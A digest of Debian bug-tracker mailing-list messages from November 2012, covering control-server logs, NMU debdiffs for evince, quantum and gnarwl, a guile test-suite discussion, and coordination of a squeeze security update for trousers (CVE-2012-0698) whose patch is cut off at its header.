 # http://ftp-master.debian.org/new.html
 #
 # Source package in NEW: a 
 href=http://packages.qa.debian.org/gnome-themes-standard;gnome-themes-standard/a
 tags 661471 + pending
Bug #661471 [gnome-themes-standard] gnome-themes-standard: removal of 
gnome-themes-standard makes files disappear from gnome-accessibility-themes
Added tag(s) pending.

End of message, stopping processing here.

Please contact me if you need assistance.
-- 
661471: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=661471
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#658139: NMU to fix this bug made to delayed/7

2012-11-08 Thread Don Armstrong
I have uploaded an NMU which fixes this bug to delayed/7. The diff for
the NMU is attached.


Don Armstrong

-- 
Sometimes I wish I could take back all my mistakes
but then I think
what if my mother could take back hers?
 -- a softer world #498
http://www.asofterworld.com/index.php?id=498

http://www.donarmstrong.com  http://rzlab.ucr.edu
diff -Nru evince-3.4.0/debian/changelog evince-3.4.0/debian/changelog
--- evince-3.4.0/debian/changelog	2012-08-29 17:28:06.0 -0700
+++ evince-3.4.0/debian/changelog	2012-11-08 10:34:13.0 -0800
@@ -1,3 +1,13 @@
+evince (3.4.0-3.1) unstable; urgency=low
+
+  * Non-maintainer Upload
+  * Support the rest of the mime types that evince used to support in
+evince-gtk.mime and evince.mime. Closes: #658139. This also fixes
+#619564, #627027, and #551734 which were related to evince.mime and
+evince-gtk.mime. #581441 was fixed in shared-mime-info/1.0.
+
+ -- Don Armstrong d...@debian.org  Thu, 08 Nov 2012 10:32:12 -0800
+
 evince (3.4.0-3) unstable; urgency=low
 
   [ Josselin Mouette ]
diff -Nru evince-3.4.0/debian/control evince-3.4.0/debian/control
--- evince-3.4.0/debian/control	2012-08-29 17:32:50.0 -0700
+++ evince-3.4.0/debian/control	2012-11-08 11:09:28.0 -0800
@@ -7,7 +7,7 @@
 Section: gnome
 Priority: optional
 Maintainer: Debian GNOME Maintainers pkg-gnome-maintain...@lists.alioth.debian.org
-Uploaders: Frederic Peters fpet...@debian.org, Michael Biebl bi...@debian.org
+Uploaders: Michael Biebl bi...@debian.org
 Build-Depends: cdbs (= 0.4.90),
debhelper (= 8),
dpkg-dev (= 1.16.1),
diff -Nru evince-3.4.0/debian/evince-gtk.mime evince-3.4.0/debian/evince-gtk.mime
--- evince-3.4.0/debian/evince-gtk.mime	1969-12-31 16:00:00.0 -0800
+++ evince-3.4.0/debian/evince-gtk.mime	2012-11-08 10:30:34.0 -0800
@@ -0,0 +1,21 @@
+application/pdf; evince %s; test=test -n $DISPLAY; nametemplate=%s.pdf; priority=5
+application/x-pdf; evince %s; test=test -n $DISPLAY; nametemplate=%s.pdf; priority=5
+application/x-bzpdf; evince %s; test=test -n $DISPLAY; nametemplate=%s.pdf.bz2; priority=5
+application/x-gzpdf; evince %s; test=test -n $DISPLAY; nametemplate=%s.pdf.gz; priority=5
+application/postscript; evince %s; test=test -n $DISPLAY; nametemplate=%s.ps; priority=5
+application/x-bzpostscript; evince %s; test=test -n $DISPLAY; nametemplate=%s.ps.bz2; priority=5
+application/x-gzpostscript; evince %s; test=test -n $DISPLAY; nametemplate=%s.ps.gz; priority=5
+image/x-eps; evince %s; test=test -n $DISPLAY; nametemplate=%s.eps; priority=5
+image/x-bzeps; evince %s; test=test -n $DISPLAY; nametemplate=%s.eps.bz2; priority=5
+image/x-gzeps; evince %s; test=test -n $DISPLAY; nametemplate=%s.eps.gz; priority=5
+application/x-dvi; evince %s; test=test -n $DISPLAY; nametemplate=%s.dvi; priority=5
+application/x-gzdvi; evince %s; test=test -n $DISPLAY; nametemplate=%s.dvi.gz; priority=5
+application/x-bzdvi; evince %s; test=test -n $DISPLAY; nametemplate=%s.dvi.bz2; priority=5
+image/vnd.djvu; evince %s; test=test -n $DISPLAY; nametemplate=%s.djvu; priority=5
+application/x-cbr; evince %s; test=test -n $DISPLAY; nametemplate=%s.cbr; priority=4
+application/x-cbt; evince %s; test=test -n $DISPLAY; nametemplate=%s.cbt; priority=4
+application/x-cbz; evince %s; test=test -n $DISPLAY; nametemplate=%s.cbz; priority=4
+application/x-cb7; evince %s; test=test -n $DISPLAY; nametemplate=%s.cb7; priority=4
+image/tiff; evince %s; test=test -n $DISPLAY; nametemplate=%s.tiff; priority=3
+application/oxps; evince %s; test=test -n $DISPLAY; nametemplate=%s.xps; priority=3
+application/vnd.ms-xpsdocument; evince %s; test=test -n $DISPLAY; nametemplate=%s.xps; priority=3
diff -Nru evince-3.4.0/debian/evince.mime evince-3.4.0/debian/evince.mime
--- evince-3.4.0/debian/evince.mime	2012-08-29 17:27:46.0 -0700
+++ evince-3.4.0/debian/evince.mime	2012-11-08 10:30:34.0 -0800
@@ -1 +1,21 @@
 application/pdf; evince %s; test=test -n $DISPLAY; nametemplate=%s.pdf; priority=5
+application/x-pdf; evince %s; test=test -n $DISPLAY; nametemplate=%s.pdf; priority=5
+application/x-bzpdf; evince %s; test=test -n $DISPLAY; nametemplate=%s.pdf.bz2; priority=5
+application/x-gzpdf; evince %s; test=test -n $DISPLAY; nametemplate=%s.pdf.gz; priority=5
+application/postscript; evince %s; test=test -n $DISPLAY; nametemplate=%s.ps; priority=5
+application/x-bzpostscript; evince %s; test=test -n $DISPLAY; nametemplate=%s.ps.bz2; priority=5
+application/x-gzpostscript; evince %s; test=test -n $DISPLAY; nametemplate=%s.ps.gz; priority=5
+image/x-eps; evince %s; test=test -n $DISPLAY; nametemplate=%s.eps; priority=5
+image/x-bzeps; evince %s; test=test -n $DISPLAY; nametemplate=%s.eps.bz2; priority=5
+image/x-gzeps; evince %s; test=test -n $DISPLAY; nametemplate=%s.eps.gz; priority=5
+application/x-dvi; evince %s; test=test -n $DISPLAY; nametemplate=%s.dvi; priority=5
+application/x-gzdvi; evince %s; test=test -n 

Bug#689687: guile-1.6: FTBFS on i386, kfreebsd-i386: testsuite failures

2012-11-08 Thread Ludovic Courtès
Hi Daniel,

Daniel Hartwig mand...@gmail.com skribis:

 If you have time, please briefly review my comments below, and whether
 it is sane to also relax these tests in Debian's guile-1.6 package (see
 attached).  I will also be investigating this further to confirm that
 guardians are working as expected with this version.

Your analysis makes perfect sense to me.

 commit e13f1cbdffa4f333d9866d1b22cd2c9a3b17b3bd
 Author: Ludovic Courtes ludovic.cour...@laas.fr
 Date:   Sun Jun 25 22:43:20 2006 +

 Fixed `guardians.test' so that it does not use symbols.

In the context of 1.6/1.8, I’d first install the above patch and see
whether it improves things.

Then, if that’s not enough, you may indeed relax the tests to (throw
'unresolved).  But make sure to do manual testing of guardians before
you do.

(The problem of these tests is that they rely on largely
non-deterministic behavior, which is why I ended up relaxing them.)

Thanks,
Ludo’.


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed (with 1 errors): Re: debian-installer: Partman can't create correct partitions

2012-11-08 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 reassign 610952 util-linux
Bug #610952 [partman-partitioning] debian-installer: Partman can't create 
correct partitions
Bug reassigned from package 'partman-partitioning' to 'util-linux'.
No longer marked as found in versions partman-partitioning/79.
Ignoring request to alter fixed versions of bug #610952 to the same values 
previously set
 forcemerge 613589 610952
Bug #613589 {Done: Alexander Kurtz kurtz.a...@googlemail.com} [util-linux] 
/sbin/cfdisk: Bad Table error after fresh Squeeze install
Bug #610952 [util-linux] debian-installer: Partman can't create correct 
partitions
Severity set to 'serious' from 'normal'
Marked Bug as done
Marked as fixed in versions util-linux/2.19.1-2.
Marked as found in versions util-linux/2.17.2-9.
Added tag(s) upstream, fixed-upstream, and patch.
Bug #613589 {Done: Alexander Kurtz kurtz.a...@googlemail.com} [util-linux] 
/sbin/cfdisk: Bad Table error after fresh Squeeze install
Added tag(s) d-i.
Bug #610952 {Done: Alexander Kurtz kurtz.a...@googlemail.com} [util-linux] 
debian-installer: Partman can't create correct partitions
Ignoring request to alter fixed versions of bug #610952 to the same values 
previously set
Unable to complete merge on previous attempt; trying again (retry: 2)
Bug #610952 {Done: Alexander Kurtz kurtz.a...@googlemail.com} [util-linux] 
debian-installer: Partman can't create correct partitions
Ignoring request to alter fixed versions of bug #610952 to the same values 
previously set
Unable to complete merge on previous attempt; trying again (retry: 3)
Bug #610952 {Done: Alexander Kurtz kurtz.a...@googlemail.com} [util-linux] 
debian-installer: Partman can't create correct partitions
Ignoring request to alter fixed versions of bug #610952 to the same values 
previously set
After four attempts, the following changes were unable to be made:
Failed to forcibly merge 613589: Not a HASH reference.

 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
610952: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=610952
613589: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=613589
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#689687: guile-1.6: FTBFS on i386, kfreebsd-i386: testsuite failures

2012-11-08 Thread Andreas Beckmann
On 2012-11-08 21:15, Ludovic Courtès wrote:
 In the context of 1.6/1.8, I’d first install the above patch and see
 whether it improves things.

I just tried relax-guardians-test.diff and the build now succeeds in my
pbuilder i386 chroot on amd64 (while -10.2 still fails).


Andreas


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed (with 1 errors): merging

2012-11-08 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 merge 613589 610952
Bug #613589 {Done: Alexander Kurtz kurtz.a...@googlemail.com} [util-linux] 
/sbin/cfdisk: Bad Table error after fresh Squeeze install
Bug #610952 {Done: Alexander Kurtz kurtz.a...@googlemail.com} [util-linux] 
debian-installer: Partman can't create correct partitions
Ignoring request to alter fixed versions of bug #610952 to the same values 
previously set
Bug #613589 {Done: Alexander Kurtz kurtz.a...@googlemail.com} [util-linux] 
/sbin/cfdisk: Bad Table error after fresh Squeeze install
Marked as fixed in versions util-linux/2.19.1-2; no longer marked as fixed in 
versions 2.19.1-2.
Bug #610952 {Done: Alexander Kurtz kurtz.a...@googlemail.com} [util-linux] 
debian-installer: Partman can't create correct partitions
Ignoring request to alter fixed versions of bug #610952 to the same values 
previously set
Bug #613589 {Done: Alexander Kurtz kurtz.a...@googlemail.com} [util-linux] 
/sbin/cfdisk: Bad Table error after fresh Squeeze install
Ignoring request to alter fixed versions of bug #613589 to the same values 
previously set
Unable to complete merge on previous attempt; trying again (retry: 2)
Bug #610952 {Done: Alexander Kurtz kurtz.a...@googlemail.com} [util-linux] 
debian-installer: Partman can't create correct partitions
Ignoring request to alter fixed versions of bug #610952 to the same values 
previously set
Bug #613589 {Done: Alexander Kurtz kurtz.a...@googlemail.com} [util-linux] 
/sbin/cfdisk: Bad Table error after fresh Squeeze install
Ignoring request to alter fixed versions of bug #613589 to the same values 
previously set
Unable to complete merge on previous attempt; trying again (retry: 3)
Bug #610952 {Done: Alexander Kurtz kurtz.a...@googlemail.com} [util-linux] 
debian-installer: Partman can't create correct partitions
Ignoring request to alter fixed versions of bug #610952 to the same values 
previously set
Bug #613589 {Done: Alexander Kurtz kurtz.a...@googlemail.com} [util-linux] 
/sbin/cfdisk: Bad Table error after fresh Squeeze install
Ignoring request to alter fixed versions of bug #613589 to the same values 
previously set
After four attempts, the following changes were unable to be made:
Failed to merge 613589: Not a HASH reference.


End of message, stopping processing here.

Please contact me if you need assistance.
-- 
610952: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=610952
613589: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=613589
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#685251: Fixing Debian bug #685251 for the ryu plugin in Openstack

2012-11-08 Thread Thomas Goirand
On 11/08/2012 02:16 AM, Julien Cristau wrote:
 On Thu, Nov  8, 2012 at 01:50:31 +0800, Thomas Goirand wrote:
 
 Now, I have to ask what the release team thinks about this. Should we
 keep the ryu pluggin package in Debian, but disable the init script by
 default, and explain the situation? Or simply remove all Ryu support?

 If a package is not useful in the context of debian main then we should
 not ship it.
 
 Cheers,
 Julien

Here's the proposed patch which removes the RYU pluggins completely. The
debdiff between 2012.1-5 and proposed 2012.1-7 is attached.

I am the author only of the RYU plugin removal part of the patch. Other
changes shall be discussed with either Loic or Ola, who respectively
uploaded and modified the Quantum package in our Git. If the release
team wishes to revert some of it, let me know, and I'll do my best to
produce a new patch.

Please let me know if the attached patch would be accepted by the
release team and avoid Quantum to be removed.

Cheers,

Thomas
diff -Nru quantum-2012.1/debian/changelog quantum-2012.1/debian/changelog
--- quantum-2012.1/debian/changelog 2012-06-12 18:15:41.0 +
+++ quantum-2012.1/debian/changelog 2012-11-08 21:49:58.0 +
@@ -1,3 +1,26 @@
+quantum (2012.1-7) unstable; urgency=low
+
+  [ Thomas Goirand ]
+  * Removes ryu packages, since the ryu app isn't available in Debian main, and
+  as per discussed with the release team (Closes: #685251).
+
+  [ Loic Dachary ]
+  * Added the gbp.conf file which is otherwise present in other Openstack
+  packages.
+
+ -- Thomas Goirand z...@debian.org  Thu, 08 Nov 2012 21:17:11 +
+
+quantum (2012.1-6) unstable; urgency=low
+
+  [ Ola Lundqvist ]
+  * Moved plugin files to the respective plugin package.
+  * The sample plugin is moved to usr/doc.
+  * Updated debian/rules to allow build two times in a row without
+breaking.
+  * Removed useless Provides: / Breaks: / Conflicts: in debian/control.
+
+ -- Loic Dachary (OuoU) l...@debian.org  Thu, 28 Jun 2012 08:12:57 +0200
+
 quantum (2012.1-5) unstable; urgency=low
 
   * Really fix upgrade from version lt 2012.1-2. Closes: #672170 
diff -Nru quantum-2012.1/debian/control quantum-2012.1/debian/control
--- quantum-2012.1/debian/control   2012-06-12 18:15:41.0 +
+++ quantum-2012.1/debian/control   2012-11-08 21:49:58.0 +
@@ -44,10 +44,7 @@
 Architecture: all
 Depends: ${python:Depends}, ${shlibs:Depends}, ${misc:Depends}, quantum-common,
  python-quantum
-Provides: quantum-plugin
-Conflicts: quantum-plugin
-Replaces: python-quantum ( 2012.1-3)
-Breaks: python-quantum ( 2012.1-3)
+Replaces: python-quantum ( 2012.1-5.1)
 Description: OpenStack Virtual network service - cisco plugin
  Quantum provides an API to dynamically request and configure virtual networks.
  These networks connect interfaces from other OpenStack services (e.g., vNICs
@@ -60,10 +57,7 @@
 Architecture: all
 Depends: ${python:Depends}, ${shlibs:Depends}, ${misc:Depends}, 
quantum-common, openvswitch-switch,
  python-quantum
-Provides: quantum-plugin
-Conflicts: quantum-plugin
-Replaces: python-quantum ( 2012.1-3)
-Breaks: python-quantum ( 2012.1-3)
+Replaces: python-quantum ( 2012.1-5.1)
 Description: OpenStack Virtual network service - openvswitch plugin
  Quantum provides an API to dynamically request and configure virtual networks.
  These networks connect interfaces from other OpenStack services (e.g., vNICs
@@ -76,10 +70,7 @@
 Architecture: all
 Depends: ${python:Depends}, ${shlibs:Depends}, ${misc:Depends}, quantum-common,
  python-quantum
-Provides: quantum-plugin
-Conflicts: quantum-plugin
-Replaces: python-quantum ( 2012.1-3)
-Breaks: python-quantum ( 2012.1-3)
+Replaces: python-quantum ( 2012.1-5.1)
 Description: OpenStack Virtual network service - sample plugin
  Quantum provides an API to dynamically request and configure virtual networks.
  These networks connect interfaces from other OpenStack services (e.g., vNICs
@@ -92,10 +83,7 @@
 Architecture: all
 Depends: ${python:Depends}, ${shlibs:Depends}, ${misc:Depends}, quantum-common,
  python-quantum
-Provides: quantum-plugin
-Conflicts: quantum-plugin
-Replaces: python-quantum ( 2012.1-3)
-Breaks: python-quantum ( 2012.1-3)
+Replaces: python-quantum ( 2012.1-5.1)
 Description: OpenStack Virtual network service - nicira NVP plugin
  Quantum provides an API to dynamically request and configure virtual networks.
  These networks connect interfaces from other OpenStack services (e.g., vNICs
@@ -109,10 +97,7 @@
 Depends: ${python:Depends}, ${shlibs:Depends}, ${misc:Depends}, quantum-common,
  bridge-utils,
  python-quantum
-Provides: quantum-plugin
-Conflicts: quantum-plugin
-Replaces: python-quantum ( 2012.1-3)
-Breaks: python-quantum ( 2012.1-3)
+Replaces: python-quantum ( 2012.1-5.1)
 Description: OpenStack Virtual network service - linux bridge plugin
  Quantum provides an API to dynamically request and configure virtual networks.
  These networks connect interfaces from 

Processed: Re: Bug#687943: gnarwl: modifies conffiles (policy 10.7.3): /etc/gnarwl.cfg

2012-11-08 Thread Debian Bug Tracking System
Processing control commands:

 tags 687943 + patch pending
Bug #687943 [gnarwl] gnarwl: modifies conffiles (policy 10.7.3): /etc/gnarwl.cfg
Added tag(s) pending and patch.
 tags 692477 + pending
Bug #692477 [gnarwl] gnarwl: [INTL:ja] New Japanese translation
Added tag(s) pending.

-- 
687943: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=687943
692477: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=692477
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#687943: gnarwl: modifies conffiles (policy 10.7.3): /etc/gnarwl.cfg

2012-11-08 Thread Sébastien Villemot
Control: tags 687943 + patch pending
Control: tags 692477 + pending

Dear Maintainer,

I have uploaded to DELAYED/2 an NMU of gnarwl versioned 3.6.dfsg-6.2,
based on the patches by Federico and Victory. The debdiff is attached.
Please let me know if I should delay the upload longer.

Regards,
diff -Nru gnarwl-3.6.dfsg/debian/changelog gnarwl-3.6.dfsg/debian/changelog
--- gnarwl-3.6.dfsg/debian/changelog	2012-09-10 23:34:12.0 +0200
+++ gnarwl-3.6.dfsg/debian/changelog	2012-11-08 21:41:48.0 +0100
@@ -1,3 +1,13 @@
+gnarwl (3.6.dfsg-6.2) unstable; urgency=low
+
+  * Non-maintainer upload.
+  * No longer ship /etc/gnarwl.cfg as a conffile; manage it using ucf to
+preserve user changes. Thanks to Federico Ceratto for writing a first
+version of the patch. (Closes: #687943)
+  * Add new Japanese debconf translation by Victory (Closes: #692477)
+
+ -- Sébastien Villemot sebast...@debian.org  Thu, 08 Nov 2012 20:40:37 +0100
+
 gnarwl (3.6.dfsg-6.1) unstable; urgency=low
 
   * Non-maintainer upload to fix pending l10n issues.
diff -Nru gnarwl-3.6.dfsg/debian/control gnarwl-3.6.dfsg/debian/control
--- gnarwl-3.6.dfsg/debian/control	2010-08-06 17:14:28.0 +0200
+++ gnarwl-3.6.dfsg/debian/control	2012-11-08 20:40:12.0 +0100
@@ -9,7 +9,7 @@
 
 Package: gnarwl
 Architecture: any
-Depends: ${shlibs:Depends}, ${misc:Depends}, adduser (=3.48), ed
+Depends: ${shlibs:Depends}, ${misc:Depends}, adduser (=3.48), ucf
 Recommends: phamm-ldap-vacation
 Description: Email autoresponder based on LDAP
  Gnarwl is an email autoresponder. Unlike the original vacation program,
diff -Nru gnarwl-3.6.dfsg/debian/patches/data-makefile.patch gnarwl-3.6.dfsg/debian/patches/data-makefile.patch
--- gnarwl-3.6.dfsg/debian/patches/data-makefile.patch	2010-07-29 16:36:11.0 +0200
+++ gnarwl-3.6.dfsg/debian/patches/data-makefile.patch	2012-11-08 21:52:27.0 +0100
@@ -1,6 +1,6 @@
 gnarwl-3.6/data/Makefile	2005-03-13 15:30:54.0 +0100
-+++ gnarwl-3.6.debian//data/Makefile	2010-07-29 15:53:35.0 +0200
-@@ -7,14 +7,14 @@
+--- a/data/Makefile
 b/data/Makefile
+@@ -7,17 +7,18 @@
  	rm -f $(BIN)-$(VER).spec gnarwl.cfg
  
  config:
@@ -16,4 +16,9 @@
 +	echo \/usr\/bin\/$(BIN)  $(HOMEDIR)/.forward
  	install -m 644 header.txt $(HOMEDIR)
  	install -m 644 footer.txt $(HOMEDIR)
- 	install -m 600 gnarwl.cfg $(CONFDIR)
+-	install -m 600 gnarwl.cfg $(CONFDIR)
++	mkdir -p $(CONFDIR)/../usr/share/gnarwl
++	install -m 600 gnarwl.cfg $(CONFDIR)/../usr/share/gnarwl/gnarwl.cfg.template
+ 	cat badheaders.txt | $(SBINDIR)/$(SBIN) -a $(HOMEDIR)/badheaders.db
+ 	cat blacklist.txt | $(SBINDIR)/$(SBIN) -a $(HOMEDIR)/blacklist.db
+ 
diff -Nru gnarwl-3.6.dfsg/debian/po/ja.po gnarwl-3.6.dfsg/debian/po/ja.po
--- gnarwl-3.6.dfsg/debian/po/ja.po	1970-01-01 01:00:00.0 +0100
+++ gnarwl-3.6.dfsg/debian/po/ja.po	2012-11-08 20:55:25.0 +0100
@@ -0,0 +1,63 @@
+# SOME DESCRIPTIVE TITLE.
+# Copyright (C) YEAR THE PACKAGE'S COPYRIGHT HOLDER
+# This file is distributed under the same license as the PACKAGE package.
+# victory victory@gmail.com, 2012.
+#
+msgid 
+msgstr 
+Project-Id-Version: gnarwl\n
+Report-Msgid-Bugs-To: \n
+POT-Creation-Date: 2012-09-16 14:29+\n
+PO-Revision-Date: 2012-09-16 23:29+0900\n
+Last-Translator: victory victory@gmail.com\n
+Language-Team: Japanese debian-japan...@lists.debian.org\n
+Language: ja\n
+MIME-Version: 1.0\n
+Content-Type: text/plain; charset=UTF-8\n
+Content-Transfer-Encoding: 8bit\n
+
+#. Type: string
+#. Description
+#: ../templates:1001
+msgid Name/address of the LDAP server:
+msgstr LDAP サーバの名前/アドレス:
+
+#. Type: string
+#. Description
+#: ../templates:1001
+msgid 
+Gnarwl contacts a LDAP server in order to get information about vacation 
+messages and accounts. Please specify the server, optionally with the port 
+to be used.
+msgstr 
+Gnarwl は休暇メッセージやアカウントの情報を得るのに LDAP サーバと通信します。
+サーバを指定してください。オプションでポートも同時に指定できます。
+
+#. Type: string
+#. Description
+#: ../templates:1001
+msgid Example: ldap.yourdomain.local:389
+msgstr 例: ldap.yourdomain.local:389
+
+#. Type: string
+#. Description
+#: ../templates:2001
+msgid Base DN of the LDAP server:
+msgstr LDAP サーバのベース DN:
+
+#. Type: string
+#. Description
+#: ../templates:2001
+msgid 
+In order to access the LDAP server, please specify the base gnarwl should 
+use for LDAP queries.
+msgstr 
+LDAP サーバへアクセスする際に LDAP クエリに gnarwl が使うベースを指定してくだ
+さい。
+
+#. Type: string
+#. Description
+#: ../templates:2001
+msgid Example: dc=yourdomain,dc=somewhere
+msgstr 例: dc=yourdomain,dc=somewhere
+
diff -Nru gnarwl-3.6.dfsg/debian/postinst gnarwl-3.6.dfsg/debian/postinst
--- gnarwl-3.6.dfsg/debian/postinst	2010-04-06 10:04:20.0 +0200
+++ gnarwl-3.6.dfsg/debian/postinst	2012-11-08 21:59:45.0 +0100
@@ -2,6 +2,10 @@
 
 set -e
 
+CONFIGFILE=/etc/gnarwl.cfg
+TMPCONF=/etc/gnarwl.cfg.dpkg-tmp
+TEMPLATE=/usr/share/gnarwl/gnarwl.cfg.template
+
 # Source debconf library.
 . /usr/share/debconf/confmodule
 
@@ 

Processed: Re: Bug#687943: gnarwl: modifies conffiles (policy 10.7.3): /etc/gnarwl.cfg

2012-11-08 Thread Debian Bug Tracking System
Processing control commands:

 tags 687943 + patch pending
Bug #687943 [gnarwl] gnarwl: modifies conffiles (policy 10.7.3): /etc/gnarwl.cfg
Ignoring request to alter tags of bug #687943 to the same tags previously set
 tags 692477 + pending
Bug #692477 [gnarwl] gnarwl: [INTL:ja] New Japanese translation
Ignoring request to alter tags of bug #692477 to the same tags previously set

-- 
687943: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=687943
692477: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=692477
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: Re: Bug#687943: gnarwl: modifies conffiles (policy 10.7.3): /etc/gnarwl.cfg

2012-11-08 Thread Debian Bug Tracking System
Processing control commands:

 tags 687943 + patch pending
Bug #687943 [gnarwl] gnarwl: modifies conffiles (policy 10.7.3): /etc/gnarwl.cfg
Ignoring request to alter tags of bug #687943 to the same tags previously set
 tags 692477 + pending
Bug #692477 [gnarwl] gnarwl: [INTL:ja] New Japanese translation
Ignoring request to alter tags of bug #692477 to the same tags previously set

-- 
687943: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=687943
692477: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=692477
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: Re: Bug#670456: [ow...@bugs.debian.org: Processed (with 1 errors): merging]

2012-11-08 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 debug 10
Debug level 10.

 merge 613589 610952
considering bug 613589 for merge
Bug #613589 {Done: Alexander Kurtz kurtz.a...@googlemail.com} [util-linux] 
/sbin/cfdisk: Bad Table error after fresh Squeeze install
613589 read 1 locks
MR|LaMont Jones lam...@debian.org|util-linux|613589|
maintainer add util-linux|LaMont Jones lam...@debian.org
613589 read done
613589 bugs 613589
read bug 610952
MR|LaMont Jones lam...@debian.org|util-linux|610952|
maintainer add util-linux|LaMont Jones lam...@debian.org
MR|LaMont Jones lam...@debian.org|util-linux|613589|
maintainer add util-linux|LaMont Jones lam...@debian.org
Bug #610952 {Done: Alexander Kurtz kurtz.a...@googlemail.com} [util-linux] 
debian-installer: Partman can't create correct partitions
Merged 610952 613589
For bug 613589 unlocking 0 locks
MR|LaMont Jones lam...@debian.org|util-linux|613589|
maintainer add util-linux|LaMont Jones lam...@debian.org
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
610952: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=610952
613589: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=613589
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: Re: Bug#692752: wget return empty file

2012-11-08 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 severity 692752 minor
Bug #692752 [wget] wget return empty file
Severity set to 'minor' from 'grave'
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
692752: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=692752
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: 692649

2012-11-08 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 notfound 692649 0.3.9-3
Bug #692649 [trousers] trousers: CVE-2012-0698
Ignoring request to alter found versions of bug #692649 to the same values 
previously set
 found 692649 0.3.5-2
Bug #692649 [trousers] trousers: CVE-2012-0698
Marked as found in versions trousers/0.3.5-2.
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
692649: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=692649
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#692649: trousers: CVE-2012-0698

2012-11-08 Thread Pierre Chifflier
On Thu, Nov 08, 2012 at 08:03:35AM +0100, Moritz Muehlenhoff wrote:
 Package: trousers
 Severity: grave
 Tags: security
 Justification: user security hole
 
 Please see here for details:
 https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-0698
 
 Cheers,
 Moritz
 

Hi Moritz,

I have tested with the python script referenced in the sourceforge
ticket [1], and testing/unstable version is not affected.

Version in squeeze seems affected, so I have prepared an upload with the
fix from upstream [2]. I am attaching the diff to this email, can you
confirm me if it is fine, and if I can upload it ?

Regards,
Pierre


[1] 
http://sourceforge.net/tracker/index.php?func=detailaid=3473554group_id=126012atid=704358
[2] 
http://trousers.git.sourceforge.net/git/gitweb.cgi?p=trousers/trousers;a=commit;h=ae0c2f8c1fd7a96ba0191f83b6057f8cbc51e786
diff -Nru trousers-0.3.5/debian/changelog trousers-0.3.5/debian/changelog
--- trousers-0.3.5/debian/changelog	2010-07-12 10:46:22.0 +0200
+++ trousers-0.3.5/debian/changelog	2012-11-08 22:17:25.0 +0100
@@ -1,3 +1,10 @@
+trousers (0.3.5-2+squeeze1) stable-security; urgency=high
+
+  * Fix crash when malformed packet is received (CVE-2012-0698)
+Closes: #692649
+
+ -- Pierre Chifflier pol...@debian.org  Thu, 08 Nov 2012 22:08:58 +0100
+
 trousers (0.3.5-2) unstable; urgency=low
 
   * QA upload.
diff -Nru trousers-0.3.5/debian/patches/04-security-cve-2012-0698.patch trousers-0.3.5/debian/patches/04-security-cve-2012-0698.patch
--- trousers-0.3.5/debian/patches/04-security-cve-2012-0698.patch	1970-01-01 01:00:00.0 +0100
+++ trousers-0.3.5/debian/patches/04-security-cve-2012-0698.patch	2012-11-08 22:17:16.0 +0100
@@ -0,0 +1,252 @@
+From ae0c2f8c1fd7a96ba0191f83b6057f8cbc51e786 Mon Sep 17 00:00:00 2001
+From: Rajiv Andrade sra...@linux.vnet.ibm.com
+Date: Tue, 17 Jan 2012 15:32:42 -0200
+Subject: [PATCH 1/1] TCSD robustness
+
+Included a set of boundary checks to increase TCSD robustness.
+
